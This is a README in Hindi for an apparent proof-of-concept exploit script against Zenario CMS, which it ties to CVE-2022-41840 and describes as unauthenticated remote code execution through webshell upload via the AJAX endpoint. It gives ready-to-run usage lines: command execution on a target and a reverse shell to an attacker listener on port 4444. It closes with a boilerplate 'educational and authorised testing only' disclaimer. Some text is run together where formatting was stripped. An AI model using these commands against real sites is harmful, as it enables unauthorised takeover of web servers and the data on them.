
यह CVE-2022-41840 के लिए PoC एक्सप्लॉइट है, जो Zenario चला रहा है।
Zenario CMS संस्करण 9.3 और उससे पहले के संस्करणों को प्रभावित करने वाली एक बिना प्रमाणीकरण वाली रिमोट कोड निष्पादन (RCE) भेद्यता। यह एक्सप्लॉइट AJAX एंडपॉइंट में फ़ाइल अपलोड भेद्यता का लाभ उठाकर PHP वेबशैल अपलोड करता है और कोड निष्पादन प्राप्त करता है।
/zenario/ajax.phppython3 zenario_exploit.py --target http://target.com
python3 zenario_exploit.py --target http://target.com --cmd "id"
python3 zenario_exploit.py --target http://target.com --lhost 10.x.x.x --lport 4444
requests लाइब्रेरीनिर्भरताएँ स्थापित करें:
pip install requests
केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए।
यह टूल सुरक्षा शोधकर्ताओं और पेनिट्रेशन परीक्षकों के लिए प्रदान किया गया है ताकि वे उन प्रणालियों का परीक्षण कर सकें जिनके वे स्वामी हैं या जिनके परीक्षण के लिए उनके पास स्पष्ट प्राधिकरण है। कंप्यूटर प्रणालियों तक अनधिकृत पहुँच अवैध है और कड़ाई से निषिद्ध है।
अनुरक्षक इस टूल से होने वाले किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेते हैं।
यह कोड केवल शैक्षिक उद्देश्यों के लिए प्रदान किया गया है।